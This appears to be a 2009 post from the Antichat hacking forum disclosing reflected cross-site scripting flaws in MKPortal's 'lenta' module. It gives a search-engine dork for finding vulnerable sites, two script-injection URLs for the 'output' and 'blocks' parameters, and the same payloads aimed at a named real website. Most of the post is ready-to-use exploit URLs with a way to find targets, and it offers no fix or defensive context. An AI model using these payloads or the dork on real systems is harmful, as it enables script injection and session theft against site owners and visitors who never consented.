27.01.2009, 00:50
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
MKPortal module lenta
Уязвимый продукт: MKPortal module lenta
Дорк: "inurl:index.php?ind=" грабер lenta
1. Multiple pXSS
Уязвимость в файле index.php.
Exploit:
Код:
/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E
Example:
Код:
http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E
__________________
Появляюсь редко. Важные дела в реале.
|
|
|